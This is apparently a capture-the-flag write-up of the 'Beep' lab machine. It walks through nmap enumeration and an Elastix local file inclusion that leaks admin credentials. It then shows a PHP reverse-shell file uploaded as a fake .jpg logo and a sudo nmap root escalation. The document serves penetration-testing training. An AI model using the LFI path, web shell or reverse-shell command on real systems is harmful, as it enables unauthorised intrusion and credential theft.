Beep

Enumeration

As usual, we start with an nmap scan, in order to find open ports in the target machine.

The following nmap command will scan the target machine looking for open ports quickly and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.7 -oN allPorts

-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Mon Jan 10 22:36:43 2022 as: nmap -sS --min-rate 5000 -p- -T5 -Pn -n -oN allPorts 10.10.10.7
Warning: 10.10.10.7 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.7
Host is up (0.063s latency).
Not shown: 65352 closed tcp ports (reset), 167 filtered tcp ports (no-response)
PORT      STATE SERVICE
22/tcp    open  ssh
25/tcp    open  smtp
80/tcp    open  http
110/tcp   open  pop3
111/tcp   open  rpcbind
143/tcp   open  imap
443/tcp   open  https
877/tcp   open  unknown
993/tcp   open  imaps
995/tcp   open  pop3s
3306/tcp  open  mysql
4190/tcp  open  sieve
4445/tcp  open  upnotifyp
4559/tcp  open  hylafax
5038/tcp  open  unknown
10000/tcp open  snet-sensor-mgmt

# Nmap done at Mon Jan 10 22:37:05 2022 -- 1 IP address (1 host up) scanned in 22.16 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan those ports more in depth and save the result into a file:

nmap -sC -sV -p22,25,80,110,111,143,443,877,993,995,3306,4190,4445,4559,5038,10000 10.10.10.7 -oN targeted

-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Mon Jan 10 22:38:04 2022 as: nmap -sCV -p22,25,80,110,111,143,443,877,993,995,3306,4190,4445,4559,5038,10000 -oN targeted 10.10.10.7
Nmap scan report for 10.10.10.7
Host is up (0.059s latency).

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: AUTH-RESP-CODE UIDL PIPELINING APOP IMPLEMENTATION(Cyrus POP3 server v2) STLS TOP USER LOGIN-DELAY(0) RESP-CODES EXPIRE(NEVER)
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            874/udp   status
|_  100024  1            877/tcp   status
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: NO ATOMIC ID CATENATE LITERAL+ OK RENAME SORT=MODSEQ Completed IMAP4 THREAD=ORDEREDSUBJECT URLAUTHA0001 BINARY STARTTLS MULTIAPPEND CONDSTORE MAILBOX-REFERRALS QUOTA LIST-SUBSCRIBED UIDPLUS CHILDREN IDLE LISTEXT ANNOTATEMORE THREAD=REFERENCES RIGHTS=kxte SORT ACL X-NETSCAPE IMAP4rev1 UNSELECT NAMESPACE
443/tcp   open  ssl/https?
|_ssl-date: 2022-01-10T22:41:29+00:00; +1h00m00s from scanner time.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
877/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix

Host script results:
|_clock-skew: 59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 10 22:44:34 2022 -- 1 IP address (1 host up) scanned in 390.13 seconds

So it looks like we have a lot of information, let's go step by step. We know there is an HTTP server running on port 80. Let's take a look at it with the whatweb tool.

whatweb http://10.10.10.7

http://10.10.10.7 [302 Found] Apache[2.2.3], Country[RESERVED][ZZ], HTTPServer[CentOS][Apache/2.2.3 (CentOS)], IP[10.10.10.7], RedirectLocation[https://10.10.10.7/], Title[302 Found]
ERROR Opening: https://10.10.10.7/ - SSL_connect returned=1 errno=0 state=error: dh key too small

So, it looks like we are getting redirected to the HTTPS web page. If we search for the website on our browser, we should see a login page by elastix.

Time to look for any common exploits. I searched for elastix with the searchsploit tool and I got some exploits.

searchsploit elastix

--------------------------------------------------------------- ---------------------------------
 Exploit Title                                                 |  Path
--------------------------------------------------------------- ---------------------------------
Elastix - 'page' Cross-Site Scripting                          | php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vulnerabilities        | php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities  | php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inclusion               | php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection                              | php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection                             | php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution         | php/webapps/18650.py
--------------------------------------------------------------- ---------------------------------

There is a Local File Inclusion exploit which could work. Let's take a look at it.

searchsploit -x php/webapps/37637.pl

#LFI Exploit: /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

If you append the LFI exploit path to https://10.10.10.7 , you should be able to get the /etc/amportal.con file. We also could see other interesting files sush as /etc/passwd.

It looks a bit messy. If we press Ctrl+U in order to view the source code, you should see the text a bit more organized.

And look at that! We got the user admin and the password jEhdIekWmdjE.

Exploitation

At this point, there are various ways to get a shell. From logging in via ssh, to doing a shellshock attack, to taking advantage of crontab tasks via webmin, and many more.

I will be exploiting the vtiger CRM.

Let's use gobuster to list directories on the website.

gobuster dir -u http://10.10.10.7/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -k

dir enumerates directories or files.
-u the target URL.
-w path to the wordlist.
-t number of current threads, in this case 200 threads.
-k skips TLS certificate verification.

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.10.10.7
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/01/17 20:37:18 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 310] [--> https://10.10.10.7/images/]
/modules              (Status: 301) [Size: 311] [--> https://10.10.10.7/modules/]
/mail                 (Status: 301) [Size: 308] [--> https://10.10.10.7/mail/]   
/help                 (Status: 301) [Size: 308] [--> https://10.10.10.7/help/]   
/static               (Status: 301) [Size: 310] [--> https://10.10.10.7/static/] 
/admin                (Status: 301) [Size: 309] [--> https://10.10.10.7/admin/]  
/themes               (Status: 301) [Size: 310] [--> https://10.10.10.7/themes/] 
/lang                 (Status: 301) [Size: 308] [--> https://10.10.10.7/lang/]   
/var                  (Status: 301) [Size: 307] [--> https://10.10.10.7/var/]    
/panel                (Status: 301) [Size: 309] [--> https://10.10.10.7/panel/]  
/libs                 (Status: 301) [Size: 308] [--> https://10.10.10.7/libs/]   
/recordings           (Status: 301) [Size: 314] [--> https://10.10.10.7/recordings/]
/configs              (Status: 301) [Size: 311] [--> https://10.10.10.7/configs/]   
/vtigercrm            (Status: 301) [Size: 313] [--> https://10.10.10.7/vtigercrm/] 
                                                                                    
===============================================================
2022/01/17 21:00:26 Finished
===============================================================

We get a lot of directories. If we go to the /vtigercrm directory, we should see another login page. Let's try the credentials we found earlier.

And we got in!

To spawn a reverse shell, we will have to go to Settings > Module Manager > Company Details.

Now we are going to create a PHP file that runs at a system level a command that sends our netcat listener a shell. Then we are going to rename the PHP file with the .jpg extension, so that the CRM will accept it. The file should look like this:

// shell.php.jpg
<?php
    system('bash -i >& /dev/tcp/10.10.14.14/4444 0>&1');
?>

Then we upload the file into the Company Logo field.

Before hitting Save, we have to set out netcat listener.

nc -lvnp 4444

-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.

Now, if we hit send, we should get the reverse shell as the user asterisk and we could grab the user flag.

listening on [any] 4444 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.10.7] 60860
bash: no job control in this shell
bash-3.2$ whoami
asterisk
cat /home/fanis/user.txt
cc9af475a7c3c3a9368515213aba4080

Privilege Escalation

Let's start the privilege escalation phase listing the sudo privileges of the asterisk user.

sudo -l

-l list user privileges.

Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
    LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper

So the user asterisk can run quite a few binaries as sudo.

GTFOBins is a great list of binaries that can be used to escalate privileges if you have the right permissions:

https://gtfobins.github.io/

If we search for nmap in the GTFOBins list, we can see that we can spawn a shell as root with the sudo privilege running the following command:

sudo nmap --interactive
nmap> !/bin/bash

And that's right, we get a shell as the root user. All we have to do now is reap the harvest and grab the root flag.

whoami
root
cat /root/root.txt
00e47778ed36a9508c16a80bb78d3696

Last updated 2 years ago

Was this helpful?